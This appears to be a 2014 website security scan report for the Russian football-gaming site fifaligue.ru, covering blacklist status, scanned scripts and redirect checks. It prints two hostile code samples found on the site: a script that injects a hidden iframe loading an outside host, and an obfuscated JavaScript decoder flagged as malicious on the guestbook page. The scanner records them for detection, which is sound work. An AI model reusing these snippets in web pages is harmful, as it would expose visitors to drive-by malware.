Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fifaligue.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fifaligue.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fifaligue.ru/ | 200 OK Content-Length: 86136 Content-Type: text/html | clean |
http://autocontext.begun.ru/autocontext2.js | 200 OK Content-Length: 249 Content-Type: application/x-javascript | clean |
http://fifaligue.ru/js/design.js | 200 OK Content-Length: 3814 Content-Type: application/javascript | clean |
http://s105.ucoz.net/src/jquery-1.3.2.js | 200 OK Content-Length: 57533 Content-Type: text/javascript | clean |
http://s105.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://login-form.bot56.ru/jogin_form_javascript.js | 200 OK Content-Length: 200 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame.
var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://login-form.bot56.ru'; wishyhd.appendChild(emptiestag);
http://fifaligue.chatovod.ru/widget/mini.js?width=170&popup=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 18:42:25 GMT Location: http://fifaligue.chatovod.ru/mini.js?width=170&popup=1 Server: nginx Content-Length: 178 Content-Type: text/html P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" | clean |
http://fifaligue.chatovod.ru/mini.js?width=170&popup=1 | 200 OK Content-Length: 2306 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?2405938 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://fifaligue.ru/forum | 200 OK Content-Length: 126551 Content-Type: text/html | clean |
http://fifaligue.ru/index/rejting_igrokov/0-16/ | 200 OK Content-Length: 42552 Content-Type: text/html | clean |
http://fifaligue.ru/index/o_sajte/0-4 | 200 OK Content-Length: 44811 Content-Type: text/html | clean |
http://fifaligue.ru/gb | 200 OK Content-Length: 59722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('Cpuw|{\'{!wlD)opkklu)\'uhtlD)zvz)\'}hs|lD);797?@?7<?)\'6E7');
Antivirus reports:
http://fifaligue.ru/index/nash_baner/0-13 | 200 OK Content-Length: 39774 Content-Type: text/html | clean |
http://fifaligue.ru/forum/27 | 200 OK Content-Length: 79867 Content-Type: text/html | clean |
http://fifaligue.ru/forum/27-40-1 | 200 OK Content-Length: 85922 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fifaligue.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sun, 07 Sep 2014 18:42:25 GMT
Pragma: no-cache
Server: nginx
Content-Length: 86136
Content-Type: text/html;charset=utf-8
Expires: Wed, 10 Sep 2014 00:00:00 GMT
Last-Modified: Sun, 07 Sep 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.29
...86136 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fifaligue.ru
Referer: http://www.google.com/search?q=fifaligue.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.